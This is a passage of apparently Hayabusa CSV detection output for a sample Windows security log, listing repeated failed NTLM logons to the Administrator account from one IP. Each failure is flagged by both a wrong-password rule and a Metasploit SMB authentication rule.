SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUy0EKmjyD6ZYENA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h3MdGstPPFJDGzwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTs0ZQa6LGrKZKsY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: FefzWjMXSvMdvqcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnUt9tPRSXR5mWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dehb4M6pcxi56Bkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tLXHvGiUqZyxax4W : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP1gKcf1eeKm0RB1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldbN1odP77n0BOzO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: drRC8qCbPe5e4mdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lBg39AUtzZi6Q4iz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huv5YEPo1n7UiFkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9CLLwao1NDtBulxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SB88EHHhDWhvJI87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBvklueV4MZo3pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: noha7Vw85VfURHik : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wl5eIYvoKpJGUcSl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsS3JTLUWcFYvxAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM6hj2bGxC124oZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3IQkVcY5iMTxCRN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v44Kp3lpGKb6Xd4j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1skdEmGlXbzUWk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feaA6lAxWjapFbAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IJZjTqY5innWcvSZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymXIp0KTw0vIbB0N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpPJEcLv7BoZaQwT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cz14Cv861RhFh0Pa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H8BklDHdS0cdcbGu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0m5Mznl2khRMj31V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ha6TuN7C8V0roSAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9oBW0yE5a9zSkpIH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n54EaKOUQIX9geqx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m6WCg3o4oatO42wW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: KfCwo8ZUWiBqI8zC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8potisENMIsbNxcd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgagMNj95dkg9uQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1EVsGLFugwePvgR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q00SeueJQAiBGpe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWzSR1cJ2XJNirSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39MY5ZvRJSHVkZZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WyOdltctwdHNkH6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUcWk0xJn9zVMZSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2sauqNlJi3y0ZBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: bkih5QcLlcjw9gjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3KlUJslcpS9jhLY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: riuVWV1Ugr9c22hR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OSj1I0sXkPf96OL : IP Address: 192.168.198.149 : AuthPackage: 
